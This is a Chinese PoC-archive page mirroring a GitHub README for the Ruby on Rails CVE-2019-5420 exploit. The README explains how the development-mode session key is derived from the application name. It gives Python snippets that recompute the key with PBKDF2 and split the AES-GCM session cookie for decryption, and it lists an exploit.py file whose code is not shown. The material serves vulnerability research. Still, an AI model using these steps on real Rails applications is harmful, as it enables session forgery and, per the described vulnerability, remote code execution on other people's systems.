POC详情: 147424d2ea0a856118d29e5b970e43cdda49ecb0

来源
https://github.com/j4k0m/CVE-2019-5420
关联漏洞
标题: Ruby on Rails 安全特征问题漏洞 (CVE-2019-5420)
描述:Ruby on Rails是Rails团队的一套基于Ruby语言的开源Web应用框架。 Ruby on Rails中存在安全特征问题漏洞。远程攻击者可利用该漏洞在受影响的系统上执行任意代码。
描述
A vulnerability can allow an attacker to guess the automatically generated development mode secret token.
介绍
# CVE-2019-5420
A vulnerability can allow an attacker to guess the automatically generated development mode secret token.

Ruby-on-Rails when it is running in development mode. In development mode, it is possible for an attacker to guess the key used to secure the sessions.

# Decryption:

## Key Generate:
Rails uses 3 environments (development,test,production), when an application uses development mode you are able to guess secret token and decrypt the encrypted session.

The key used to protect session is derived from the application's name.

Example:
```bash
rails new Jakom
```
Jakom: Application Name.

By this we can guess the key is output of the generation method:
```
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]
```
As we can see here:
```python
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)
```
## Decrypt the session with the key:

In Rails, sessions are encrypted with AES-265-GCM, if you have the key you can decrypt/encrypt sessions.

Last thing you will need is the format of the session:
```
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]
```

## Decrypt example:
As we can see here:
```python
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")
```
The first part of the session cookie is the encrypted data, the second part is the IV, the third part is the GCM tag (Authentication Tag).
With those informations we can decrypt our sessions directly:
![image](https://user-images.githubusercontent.com/48088579/132349913-ed4e4e16-a50c-4652-9eee-d561d8372d0c.png)

### Example:

![image](https://user-images.githubusercontent.com/48088579/132350436-c798596f-3c15-4e47-8d2f-d1bd63a4045d.png)
文件快照

 [4.0K]  /data/pocs/147424d2ea0a856118d29e5b970e43cdda49ecb0
├── [1.2K]  exploit.py
├── [1.9K]  README.md
└── [  30]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。